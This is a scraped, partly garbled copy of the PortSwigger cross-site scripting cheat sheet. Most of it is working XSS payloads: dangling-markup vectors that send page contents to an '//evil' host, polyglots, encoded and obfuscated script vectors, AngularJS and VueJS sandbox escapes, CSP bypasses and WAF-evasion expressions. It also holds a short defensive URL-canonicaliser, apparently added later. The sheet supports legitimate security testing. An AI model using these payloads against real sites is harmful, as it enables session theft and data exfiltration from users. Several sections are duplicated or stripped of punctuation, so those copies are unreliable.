<video><source src="//evil?
Audio using source element and src attribute
<audio><source src="//evil?
Input src
<input type=image src="//evil?
Button using formaction
<form><button style="width:100%;height:100%" type=submit formaction="//evil?
Input using formaction
<form><input type=submit value="XSS" style="width:100%;height:100%" type=submit formaction="//evil?
Form using action
<button form=x style="width:100%;height:100%"><form id=x action="//evil?
Object data
<object data="//evil?
Iframe src
<iframe src="//evil?
Embed src
<embed src="//evil?
Embed src
<embed src "//evil?
Use textarea to consume markup and post to an external site
<form><button formaction=//evil>XSS</button><textarea name=x>
Pass markup data through window.name using formtarget
<button form=x>XSS</button><form id=x action=//evil target="
Pass markup data through window.name using base target
<a href=http://subdomain1.portswigger-labs.net/dangling_markup/name.html><font size=100 color=red>You must click me</font></a><base target="
Pass markup data through window.name using formtarget
<form><input type=submit value="Click me" formaction=http://subdomain1.portswigger-labs.net/dangling_markup/name.html formtarget="
Using base href to pass data
<a href=abc style="width:100%;height:100%;position:absolute;font-size:1000px;">xss<base href="//evil/
Using embed window name to pass data from the page
<embed src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="
Using iframe window name to pass data from the page
<iframe src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="
Using object window name to pass data from the page
<object data=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="
Using frame window name to pass data from the page
<frameset><frame src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="
Overwrite type attribute with image in hidden inputs
<input type=hidden type=image src="//evil?
Polyglots
Polyglot payload 1
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
Polyglot payload 2
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>
Polyglot payload 3
javascript--gtlttitlegtltstylegtlttextareagtltscriptgtltxmpgtltdetailsopenontoggle=+`++onmouseover=1+[[]+alert(PortSwiggerRes)gt
14 oncut=alert`` 128279
Basic context lengthlimit arbitrary code
Its all well and good executing JavaScript but if all you can do is call alert what use is that Inthis lab we demonstrate the shortest possible way to execute arbitrary code
19 ltqoncut=eval(name)
128279
Attribute context lengthlimit arbitrary code
Again calling alert proves you can call a function but we created another lab to find theshortest possible attribute based injection with arbitrary JavaScript
17 See link 128279
Injection occurs inside aframeset but before thebody
We received a request from twitter about this next lab It occurs within a frameset but before abody tag with equals filtered You would think you could inject a closing frameset followed by ascript block but that would be too easy
NA NA 128279
Injection occurs insidesingle quoted stringonly characters a-z0-9+` are allowed
The injection occurs within a single quoted string and the challenge is to execute arbitrarycode using the charset a-zA-Z0-9+`
NA NA 128279
VBScript protocol used to work in IE lta href=vbscriptMsgBox+1gtXSSltagt lta href= onclick=vbsMsgbox+1gtXSSltagt lta href= onclick=VBSMsgbox+1gtXSSltagt lta href= onclick=vbscriptMsgbox+1gtXSSltagt lta href= onclick=VBSCRIPTMsgbox+1gtXSSltagt lta href= language=vbs onclick=vbscriptMsgbox+1gtXSSltagt
JScript compact was a minimal version of JS thatwasnt widely used in IE
lta href= onclick=jscriptcompactalert(1)gttestltagt lta href= onclick=JSCRIPTCOMPACTalert(1)gttestltagt
JScriptEncode allows encoded JavaScript lta href= language=JScriptEncode onclick=~^CAAAAA==C^+D`8mgIAAA==^~gtXSSltagt lta href= onclick=JScriptEncode~^CAAAAA==C^+D`8mgIAAA==^~gtXSSltagt
VBScriptEncoded allows encoded VBScript ltiframe onload=VBScriptEncode~^CAAAAA==ko$K6FoQIAAA==^~gt ltiframe language=VBScriptEncode onload=~^CAAAAA==ko$K6FoQIAAA==^~gt
JavaScript entities used to work in NetscapeNavigator
lta title=ampalert(1)gtXSSltagt
JavaScript stylesheets used to be supported byNetscape Navigator
ltlink href=xssjs rel=stylesheet type=textjavascriptgt
Button used to consume markup ltformgtltbutton name=x formaction=xgtltbgtstealme
IE9 select elements and plaintext used to consumemarkup
ltform action=xgtltbuttongtXSSltbuttongtltselect name=xgtltoptiongtltplaintextgtltscriptgttoken=supersecretltscriptgt
XBL Firefox only lt= 2 ltdiv style=-moz-bindingurl(businessinfocouklabsxblxblxmlxss)gt ltdiv style=-moz-bindingurl(businessinfocouklabsxblxblxmlxss)gt ltdiv style=-moz-bindin67url(businessinfocouklab sxblxblxmlxss)gt ltdiv style=-moz-bindinampx5c67url(businessinfocouklab sxblxblxmlxss)gt
XBL also worked in FF35 using data urls ltimg src=blah style=-moz-binding url(datatextxmlcharset=utf-83C3Fxml20version3D2210223F3E3Cbindings20xmlns3D22 http3Awwwmozillaorgxbl223E3Cbinding20id3D22loader223E3Cimplementation3E3Cconstructor3E3C215BCDATA5Bvar20url203D2022alertjs 223B20var20scr203D20documentcreateElement2822script22293B20scrsetAttribute2822src222Curl293B20var20bodyElement203D20 documentgetElementsByTagName2822html2229item280293B20bodyElementappendChild28scr293B205D5D3E3Cconstructor3E3Cimplementation3E3C binding3E3Cbindings3E) gt
CSS expressions lt=IE7 ltdiv style=xssexpression(alert(1))gt ltdiv style=xssexpression(1)-alert(1)gt ltdiv style=xssexpressio6e(alert(1))gt ltdiv style=xssexpressio006e(alert(1))gt ltdiv style=xssexpressio00006e(alert(1))gt ltdiv style=xssexpressio6e(alert(1))gt ltdiv style=xssexpressioampx5c6e(alert(1))gt
In quirks mode IE allowed you to use = instead of ltdiv style=xss=expression(alert(1))gt ltdiv style=colorampx3dredgttestltdivgt
Behaviors for older modes of IE lta style=behaviorurl(defaultAnchorClick) folder=javascriptalert(1)gtXSSltagt
Older versions of IE supported event handlers infunctions
ltscriptgt function windowonload() alert(1) ltscriptgt ltscriptgt function windowonload() alert(1) ltscriptgt ltscriptgt function windowlocation() ltscriptgt ltbodygt ltscriptgt functionltimg src=1 onerror=alert(1)gtdocumentbodyinnerHTML() ltscriptgt ltbodygt ltbodygt
y
ltscriptgt function documentbodyinnerHTML() x = ltimg src=1 onerror=alert(1)gt ltscriptgt ltbodygt
GreyMagic HTML+time exploit (no longer workseven in 5 docmode)
ltHTMLgtltBODYgtltxmlnamespace prefix=t ns=urnschemas-microsoft-comtimegtltimport namespace=t implementation=defaulttime2gtlttset attributeName=innerHTML to=XSSltimg src=1 onerror=alert(1)gtgt ltBODYgtltHTMLgt
Firefox allows NULLS after amp lta href=javascriptampx6aavascriptalert(1)gtFirefoxltagt
Firefox allows NULLs inside named entities lta href=javascriptampcolonalert(1)gtFirefoxltagt
Firefox allows NULL characters inside openingcomments
lt-- gtltimg title=--gtltiframeonload=alert(1)gtgt --gt lt-- gtltimg title=--gtltiframeonload=alert(1)gtgt --gt
Safari used to allow any tag to have a onload eventinside SVG
ltsvggtltxss onload=alert(1)gt
Isindex using src attribute ltisindex type=image src=evil
Isindex using submit ltisindex type=submit style=width100height100 value=XSS formaction=evil
Isindex and formaction ltisindex type=submit formaction=javascriptalert(1)gt
Isindex and action ltisindex type=submit action=javascriptalert(1)gt
CreditsBrought to you by PortSwigger lovingly constructed by Gareth Heyes
This cheat sheet wouldnt be possible without the web security community who share their research Big thanks to James Kettle Mario Heiderich EduardoVela Masato Kinugawa Filedescriptor LeverOne Ben Hayak Alex Infuumlhr Mathias Karlsson Jan Horn Ian Hickey Gaacutebor Molnaacuter tsetnep Psych0tr1aSkyphire Abdulrhman Alqabandi brainpillow Kyo Yosuke Hasegawa White Jordan Algol jackmasa wpulog Bolk Robert Hansen David LindsaySuperhei Michal Zalewski Renaud Lifchitz Roman Ivanov Frederik Braun Krzysztof Kotowicz Giorgio Maone GreyMagic Marcus Niemietz SoroushDalili Stefano Di Paola Roman Shafigullin Lewis Ardern Michał Bentkowski SOslashᴘᴀS avanish46 Juuso Kaumlenmaumlki jinmo123 itszn13 Martin Bajanik DavidGranqvist Andrea (theMiddle) Menin simps0n hahwul Paweł Hałdrzyński Jun Kokatsu RenwaX23 sratarun har1sec Yann C gadhiyasavan p4fgdiofeher
You can contribute to this cheat sheet by creating a new issue or updating the JSON and creating a pull request
Unicode escapes: <script>\u0061lert(1)</script>
Unicode escapes ES6 style: <script>\u{61}lert(1)</script>
Unicode escapes ES6 style zero padded: <script>\u{0000000061}lert(1)</script>
Hex encoding JavaScript escapes: <script>eval('\x61lert(1)')</script>
Octal encoding: <script>eval('\141lert(1)')</script> <script>eval('alert(\061)')</script> <script>eval('alert(\61)')</script>
Decimal encoding with optional semi-colon: <a href="&#106;avascript:alert(1)">XSS</a> <a href="&#106avascript:alert(1)">XSS</a>
SVG script with HTML encoding: <svg><script>&#97;lert(1)</script></svg> <svg><script>&#x61;lert(1)</script></svg> <svg><script>alert&NewLine;(1)</script></svg> <svg><script>x="&quot;,alert(1)//";</script></svg>
Decimal encoding with padded zeros: <a href="&#0000106avascript:alert(1)">XSS</a>
Hex encoding entities: <a href="&#x6a;avascript:alert(1)">XSS</a>
Hex encoding without semi-colon, provided the next character is not a-f0-9: <a href="j&#x61vascript:alert(1)">XSS</a> <a href="&#x6a avascript:alert(1)">XSS</a> <a href="&#x6a avascript:alert(1)">XSS</a> (the whitespace after &#x6a in the last two is a newline and a carriage return respectively, which the URL parser strips)
Hex encoding with padded zeros: <a href="&#x0000006a;avascript:alert(1)">XSS</a>
Hex encoding is not case sensitive: <a href="&#X6A;avascript:alert(1)">XSS</a>
HTML entities: <a href="javascript&colon;alert(1)">XSS</a> <a href="java&Tab;script:alert(1)">XSS</a> <a href="java&NewLine;script:alert(1)">XSS</a> <a href="javascript&colon;alert&lpar;1&rpar;">XSS</a>
URL encoding: <a href="javascript:x='%27-alert(1)-%27'">XSS</a>
HTML entities and URL encoding: <a href="javascript:x='&percnt;27-alert(1)-%27'">XSS</a>
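The encoded href vectors above all work for the same reason: the HTML parser decodes character references in the attribute value before the URL parser sees the scheme, and the URL parser then drops tab, newline and carriage return. The following is an added defensive example, not code from the cheat sheet, that canonicalises an attribute value the same way before deciding whether it carries a script-capable scheme; the named-reference subset, the scheme list and the sample values are assumptions constructed here.

```javascript
// Added example (not part of the PortSwigger cheat sheet): a defensive
// canonicaliser for href/src attribute values. A filter that matches on
// the raw attribute text misses "&#106;avascript:", "java&Tab;script:"
// or "javascript&colon;"; compare the canonical form instead.

// Subset of HTML named references used by the vectors above
// (constructed list, not the full HTML5 table).
const NAMED_REFS = {
  colon: ":", Tab: "\t", NewLine: "\n", lpar: "(", rpar: ")", sol: "/",
  quot: "\"", apos: "'", amp: "&", lt: "<", gt: ">", percnt: "%",
};

// Decode numeric and named character references the way an HTML parser
// does for attribute values: decimal (&#106;), hex in either case
// (&#x6a; / &#X6A;), any amount of zero padding, and a missing semicolon
// where the next character cannot continue the number (this is why
// "&#x6aavascript" does NOT decode to "javascript": the "a" is consumed).
function decodeCharRefs(text) {
  return text.replace(
    /&(?:#[xX]([0-9a-fA-F]+);?|#([0-9]+);?|([A-Za-z][A-Za-z0-9]*);)/g,
    (match, hex, dec, name) => {
      if (name !== undefined) {
        return Object.prototype.hasOwnProperty.call(NAMED_REFS, name)
          ? NAMED_REFS[name]
          : match; // unknown name: left as-is, as a browser would
      }
      const cp = hex !== undefined ? parseInt(hex, 16) : parseInt(dec, 10);
      // Out-of-range references become U+FFFD rather than throwing.
      return cp > 0x10ffff ? "\uFFFD" : String.fromCodePoint(cp);
    }
  );
}

// Apply the URL parser's own normalisation: strip leading/trailing C0
// controls and spaces, then remove tab, LF and CR wherever they occur.
function canonicaliseUrl(raw) {
  return decodeCharRefs(raw)
    .replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, "")
    .replace(/[\t\n\r]/g, "");
}

// Scheme of the canonical URL, lower-cased, or null for a relative URL.
function urlScheme(raw) {
  const m = /^([A-Za-z][A-Za-z0-9+.-]*):/.exec(canonicaliseUrl(raw));
  return m ? m[1].toLowerCase() : null;
}

// Schemes that can carry script or markup into the page (assumption:
// a reasonable default, adjust to the application).
const SCRIPT_SCHEMES = new Set(["javascript", "vbscript", "data"]);

// True when the attribute value would resolve to a script-capable URL.
function isScriptUrl(raw) {
  const scheme = urlScheme(raw);
  return scheme !== null && SCRIPT_SCHEMES.has(scheme);
}

// Constructed attribute values mirroring the encoded vectors above,
// paired with the verdict a correct canonicaliser must reach.
const SAMPLE_HREFS = [
  ["&#106;avascript:alert(1)", true],          // decimal, with semicolon
  ["&#106avascript:alert(1)", true],           // decimal, no semicolon
  ["&#0000106avascript:alert(1)", true],       // zero padded decimal
  ["&#x6a;avascript:alert(1)", true],          // hex
  ["&#X6A;avascript:alert(1)", true],          // hex, upper case
  ["&#x0000006a;avascript:alert(1)", true],    // zero padded hex
  ["j&#x61vascript:alert(1)", true],           // no semicolon, next char not hex
  ["&#x6a\navascript:alert(1)", true],         // newline inside the scheme
  ["java&Tab;script:alert(1)", true],          // named reference for tab
  ["java&NewLine;script:alert(1)", true],      // named reference for newline
  ["javascript&colon;alert(1)", true],         // named reference for colon
  ["  JavaScript:alert(1)", true],             // leading spaces, mixed case
  ["https://example.test/?next=javascript:x", false], // scheme is https
  ["/account?id=1", false],                    // relative URL, no scheme
];

// Runs every sample through isScriptUrl and returns the values whose
// verdict differs from the expected one (empty array means all agree).
function mismatches() {
  return SAMPLE_HREFS
    .filter(([href, expected]) => isScriptUrl(href) !== expected)
    .map(([href]) => href);
}
```

Canonicalising is only a detection aid; the mitigation for this injection context remains an allow-list of schemes applied to the decoded URL before it is written into the attribute.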
Obfuscation
Data protocol inside script src with base64: <script src="data:text/javascript;base64,YWxlcnQoMSk="></script>
Data protocol inside script src with base64 and HTML entities: <script src="data:text/javascript;base64,&#x59;&#x57;&#x78;&#x6c;&#x63;&#x6e;&#x51;&#x6f;&#x4d;&#x53;&#x6b;&#x3d;"></script>
Data protocol inside script src with base64 and URL encoding: <script src="data:text/javascript;base64,%59%57%78%6c%63%6e%51%6f%4d%53%6b%3d"></script>
Iframe srcdoc HTML encoded: <iframe srcdoc="&lt;script&gt;alert&lpar;1&rpar;&lt;&sol;script&gt;"></iframe>
Iframe JavaScript URL with HTML and URL encoding: <iframe src="javascript:&#x25;&#x33;&#x43;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x25;&#x33;&#x45;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;&#x25;&#x33;&#x43;&#x25;&#x32;&#x46;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x25;&#x33;&#x45;"></iframe>
SVG script with unicode escapes and HTML encoding: <svg><script>&#x5c;&#x75;&#x30;&#x30;&#x36;&#x31;&#x5c;&#x75;&#x30;&#x30;&#x36;&#x63;&#x5c;&#x75;&#x30;&#x30;&#x36;&#x35;&#x5c;&#x75;&#x30;&#x30;&#x37;&#x32;&#x5c;&#x75;&#x30;&#x30;&#x37;&#x34;(1)</script></svg>
Client-side template injection
VueJS reflected
Version | Author | Length | Vector
All versions | Mario Heiderich (Cure53) | 41 | {{constructor.constructor('alert(1)')()}}
All versions | Mario Heiderich (Cure53) & Sebastian Lekies (Google), Eduardo Vela Nava (Google), Krzysztof Kotowicz (Google) | 62 | <div v-html="''.constructor.constructor('alert(1)')()">a</div>
All versions | Gareth Heyes (PortSwigger) | 39 | <x v-html=_c.constructor('alert(1)')()>
All versions | Peter af Geijerstam (Swedish Shellcode Factory) | 37 | <x v-if=_c.constructor('alert(1)')()>
AngularJS sandbox escapes reflected
Version | Author | Length | Vector
1.0.1 - 1.1.5 | Mario Heiderich (Cure53) | 41 | {{constructor.constructor('alert(1)')()}}
1.0.1 - 1.1.5 (shorter) | Gareth Heyes (PortSwigger) & Lewis Ardern (Synopsys) | 33 | {{$on.constructor('alert(1)')()}}
1.2.0 - 1.2.1 | Jan Horn (Google) | 122 | {{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}
1.2.2 - 1.2.5 | Gareth Heyes (PortSwigger) | 23 | )))alert(1)
1.2.6 - 1.2.18 | Jan Horn (Google) | 106 | {{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}
1.2.19 - 1.2.23 | Mathias Karlsson (Detectify) | 124 | {{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}}
1.2.24 - 1.2.29 | Gareth Heyes (PortSwigger) | 23 | )))alert(1)
1.2.27 - 1.2.29, 1.3.0 - 1.3.20 | Gareth Heyes (PortSwigger) | 23 | )))alert(1)
1.3.0 | Gábor Molnár (Google) | 272 | {{!ready && (ready = true) && (!call ? $$watchers[0].get(toString.constructor.prototype) : (a = apply) && (apply = constructor) && (valueOf = call) && (''+''.toString('F = Function.prototype;' + 'F.apply = F.a;' + 'delete F.a;' + 'delete F.valueOf;' + 'alert(1);')))}}
1.3.3 - 1.3.18 | Gareth Heyes (PortSwigger) | 128 | {{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}
1.3.19 | Gareth Heyes (PortSwigger) | 102 | {{'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join;$eval('x=alert(1)');}}
1.3.20 | Gareth Heyes (PortSwigger) | 65 | {{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}
1.4.0 - 1.4.9 | Gareth Heyes (PortSwigger) | 74 | {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
1.5.0 - 1.5.8 | Ian Hickey & Gareth Heyes (PortSwigger) | 79 | {{x={'y':''.constructor.prototype};x['y'].charAt=[].join;$eval('x=alert(1)');}}
1.5.9 - 1.5.11 | Jan Horn (Google) | 517 | c=subcallb=subbinda=subapply c$apply=$applyc$eval=bop=$root$$phase $root$$phase=nullod=$root$digest$root$digest=()toString C=c$apply(c)$root$$phase=op$root$digest=od B=C(bcb)$evalAsync( astNode=pop()astNodetype=UnaryExpression astNodeoperator=(windowXvoid0(windowX=truealert(1)))+ astNodeargument=typeIdentifiernamefoo ) m1=B($$asyncQueuepop()expressionnull$root) m2=B(Cnullm1)[]pushapply=m2a=sub $eval(a(bc))[]pushapply=a
>=1.6.0 | Mario Heiderich (Cure53) | 41 | {{constructor.constructor('alert(1)')()}}
>=1.6.0 (shorter) | Gareth Heyes (PortSwigger) & Lewis Ardern (Synopsys) | 33 | {{$on.constructor('alert(1)')()}}
DOM based AngularJS sandbox escapes (using orderBy or no $eval)
Version | Author | Length | Vector
1.0.1 - 1.1.5 | Mario Heiderich (Cure53) | 37 | constructor.constructor('alert(1)')()
1.2.0 - 1.2.18 | Jan Horn (Google) | 118 | a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()
1.2.19 - 1.2.23 | Mathias Karlsson (Detectify) | 119 | toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor)
1.2.24 - 1.2.26 | Gareth Heyes (PortSwigger) | 317 | {}[['__proto__']]['x']=constructor.getOwnPropertyDescriptor;g={}[['__proto__']]['x'];{}[['__proto__']]['y']=g(''.sub[['__proto__']],'constructor');{}[['__proto__']]['z']=constructor.defineProperty;d={}[['__proto__']]['z'];d(''.sub[['__proto__']],'constructor',{value:false});{}[['__proto__']]['y'].value('alert(1)')()
1.2.27 - 1.2.29, 1.3.0 - 1.3.20 | Gareth Heyes (PortSwigger) | 20 | )))alert(1)
1.4.0 - 1.4.5 | Gareth Heyes (PortSwigger) | 75 | 'a'.constructor.prototype.charAt=[].join;[1]|orderBy:'x=1} } };alert(1)//';
>=1.6.0 | Mario Heiderich (Cure53) | 37 | constructor.constructor('alert(1)')()
1.4.4 (without strings) | Gareth Heyes (PortSwigger) | 134 | toString().constructor.prototype.charAt=[].join; [1,2]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)
AngularJS CSP bypasses
Version | Author | Length | Vector
All versions (Chrome) | Gareth Heyes (PortSwigger) | 81 | <input autofocus ng-focus="$event.path|orderBy:'[].constructor.from([1],alert)'">
All versions (Chrome) shorter | Gareth Heyes (PortSwigger) | 56 | <input id=x ng-focus=$event.path|orderBy:'(z=alert)(1)'>
All versions (all browsers) shorter | Gareth Heyes (PortSwigger) | 91 | <input autofocus ng-focus="$event.composedPath()|orderBy:'[].constructor.from([1],alert)'">
1.2.0 - 1.5.0 | Eduardo Vela (Google) | 190 | <div ng-app ng-csp><div ng-focus="x=$event;" id=f tabindex=0>foo</div><div ng-repeat="(key, value) in x.view"><div ng-if="key == 'window'">{{ [1].reduce(value.alert, 1); }}</div></div></div>
All versions (Chrome) shorter via oncut | Savan Gadhiya (NotSoSecure) | 49 | <input ng-cut=$event.path|orderBy:'(y=alert)(1)'>
Scriptless attacks
Dangling markup
Background attribute: <body background="//evil? <table background="//evil? <table><thead background="//evil? <table><tbody background="//evil? <table><tfoot background="//evil? <table><td background="//evil? <table><th background="//evil?
Link href stylesheet: <link rel=stylesheet href="//evil?
Link href icon: <link rel=icon href="//evil?
Meta refresh: <meta http-equiv="refresh" content="0; http://evil?
Img to pass markup through src attribute: <img src="//evil? <image src="//evil?
Video using track element: <video><track default src="//evil?
Video using source element and src attribute: <video><source src="//evil?
Audio using source element and src attribute: <audio><source src="//evil?
Input src: <input type=image src="//evil?
Button using formaction: <form><button style="width:100%;height:100%" type=submit formaction="//evil?
Input using formaction: <form><input type=submit value=XSS style="width:100%;height:100%" type=submit formaction="//evil?
Form using action: <button form=x style="width:100%;height:100%;"><form id=x action="//evil?
Object data: <object data="//evil?
Iframe src: <iframe src="//evil?
Embed src: <embed src="//evil?
Embed src (no equals): <embed src //evil?
Use textarea to consume markup and post to external site: <form><button formaction=//evil>XSS</button><textarea name=x>
Pass markup data through window.name using form target: <button form=x>XSS</button><form id=x action=//evil/ target='
Pass markup data through window.name using base target: <a href=http://subdomain1.portswigger-labs.net/dangling_markup/name.html><font size=100 color=red>You must click me</font></a><base target="
Pass markup data through window.name using formtarget: <form><input type=submit value="Click me" formaction=http://subdomain1.portswigger-labs.net/dangling_markup/name.html formtarget="
Using base href to pass data: <a href=abc style="width:100%;height:100%;position:absolute;font-size:1000px;">xss<base href="//evil/
Using embed window name to pass data from the page: <embed src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="
Using iframe window name to pass data from the page: <iframe src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="
Using object window name to pass data from the page: <object data=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="
Using frame window name to pass data from the page: <frameset><frame src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="
Overwrite type attribute with image in hidden inputs: <input type=hidden type=image src="//evil?
Polyglots
Polyglot payload 1: javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
Polyglot payload 2: javascript:`//"//\"//</noscript></title></textarea></style></template></noembed></script/--><html \" onmouseover=/*&lt;svg/*/onload=alert()//>
Polyglot payload 3: javascript:/*--></title></style></textarea></script></xmp><details/open/ontoggle='+/`/+/"/+/onmouseover=1/+/[*/[]/+alert(/@PortSwiggerRes/)//'>
WAF bypass global objects
Each technique below is listed for the seven global references window, self, this, top, parent, frames and globalThis.
XSS into a JavaScript string, string concatenation:
window["ale"+"rt"](window["doc"+"ument"]["dom"+"ain"])
self["ale"+"rt"](self["doc"+"ument"]["dom"+"ain"])
this["ale"+"rt"](this["doc"+"ument"]["dom"+"ain"])
top["ale"+"rt"](top["doc"+"ument"]["dom"+"ain"])
parent["ale"+"rt"](parent["doc"+"ument"]["dom"+"ain"])
frames["ale"+"rt"](frames["doc"+"ument"]["dom"+"ain"])
globalThis["ale"+"rt"](globalThis["doc"+"ument"]["dom"+"ain"])
XSS into a JavaScript string, comment syntax:
window[/*foo*/"alert"/*bar*/](window[/*foo*/"document"/*bar*/]["domain"])
self[/*foo*/"alert"/*bar*/](self[/*foo*/"document"/*bar*/]["domain"])
this[/*foo*/"alert"/*bar*/](this[/*foo*/"document"/*bar*/]["domain"])
top[/*foo*/"alert"/*bar*/](top[/*foo*/"document"/*bar*/]["domain"])
parent[/*foo*/"alert"/*bar*/](parent[/*foo*/"document"/*bar*/]["domain"])
frames[/*foo*/"alert"/*bar*/](frames[/*foo*/"document"/*bar*/]["domain"])
globalThis[/*foo*/"alert"/*bar*/](globalThis[/*foo*/"document"/*bar*/]["domain"])
XSS into a JavaScript string, hex escape sequence:
window["\x61\x6c\x65\x72\x74"](window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x64\x6f\x6d\x61\x69\x6e"])
self["\x61\x6c\x65\x72\x74"](self["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x64\x6f\x6d\x61\x69\x6e"])
this["\x61\x6c\x65\x72\x74"](this["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x64\x6f\x6d\x61\x69\x6e"])
top["\x61\x6c\x65\x72\x74"](top["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x64\x6f\x6d\x61\x69\x6e"])
parent["\x61\x6c\x65\x72\x74"](parent["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x64\x6f\x6d\x61\x69\x6e"])
frames["\x61\x6c\x65\x72\x74"](frames["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x64\x6f\x6d\x61\x69\x6e"])
globalThis["\x61\x6c\x65\x72\x74"](globalThis["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x64\x6f\x6d\x61\x69\x6e"])
XSS into a JavaScript string, hex escape sequence and base64 encoded string:
window["\x65\x76\x61\x6c"](window["\x61\x6c\x65\x72\x74"](window["\x61\x74\x6f\x62"]("WFNT")))
self["\x65\x76\x61\x6c"](self["\x61\x6c\x65\x72\x74"](self["\x61\x74\x6f\x62"]("WFNT")))
this["\x65\x76\x61\x6c"](this["\x61\x6c\x65\x72\x74"](this["\x61\x74\x6f\x62"]("WFNT")))
top["\x65\x76\x61\x6c"](top["\x61\x6c\x65\x72\x74"](top["\x61\x74\x6f\x62"]("WFNT")))
parent["\x65\x76\x61\x6c"](parent["\x61\x6c\x65\x72\x74"](parent["\x61\x74\x6f\x62"]("WFNT")))
frames["\x65\x76\x61\x6c"](frames["\x61\x6c\x65\x72\x74"](frames["\x61\x74\x6f\x62"]("WFNT")))
globalThis["\x65\x76\x61\x6c"](globalThis["\x61\x6c\x65\x72\x74"](globalThis["\x61\x74\x6f\x62"]("WFNT")))
XSS into a JavaScript string, octal escape sequence:
window["\141\154\145\162\164"]("\130\123\123")
self["\141\154\145\162\164"]("\130\123\123")
this["\141\154\145\162\164"]("\130\123\123")
top["\141\154\145\162\164"]("\130\123\123")
parent["\141\154\145\162\164"]("\130\123\123")
frames["\141\154\145\162\164"]("\130\123\123")
globalThis["\141\154\145\162\164"]("\130\123\123")
XSS into a JavaScript string, unicode escape:
window["\u0061\u006c\u0065\u0072\u0074"]("\u0058\u0053\u0053")
self["\u0061\u006c\u0065\u0072\u0074"]("\u0058\u0053\u0053")
this["\u0061\u006c\u0065\u0072\u0074"]("\u0058\u0053\u0053")
top["\u0061\u006c\u0065\u0072\u0074"]("\u0058\u0053\u0053")
parent["\u0061\u006c\u0065\u0072\u0074"]("\u0058\u0053\u0053")
frames["\u0061\u006c\u0065\u0072\u0074"]("\u0058\u0053\u0053")
globalThis["\u0061\u006c\u0065\u0072\u0074"]("\u0058\u0053\u0053")
XSS into a JavaScript string, RegExp source property:
window[/al/.source+/ert/.source](/XSS/.source)
self[/al/.source+/ert/.source](/XSS/.source)
this[/al/.source+/ert/.source](/XSS/.source)
top[/al/.source+/ert/.source](/XSS/.source)
parent[/al/.source+/ert/.source](/XSS/.source)
frames[/al/.source+/ert/.source](/XSS/.source)
globalThis[/al/.source+/ert/.source](/XSS/.source)
XSS into a JavaScript string, Hieroglyphy/JSFuck (each bracketed expression builds one letter of "alert" from the string forms of NaN, false, undefined and true):
window[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])
self[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])
this[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])
top[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])
parent[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])
frames[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])
globalThis[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])
Impossible labs
Title | Description | Length limit | Closest vector
Basic context, WAF blocks <[a-zA-Z] | This lab captures the scenario where you can't use an open tag followed by an alphanumeric character. Sometimes you can solve this problem by bypassing the WAF entirely, but what about when that's not an option? Certain versions of .NET have this behaviour and it's only known to be exploitable in old IE with <%tag. | N/A | N/A
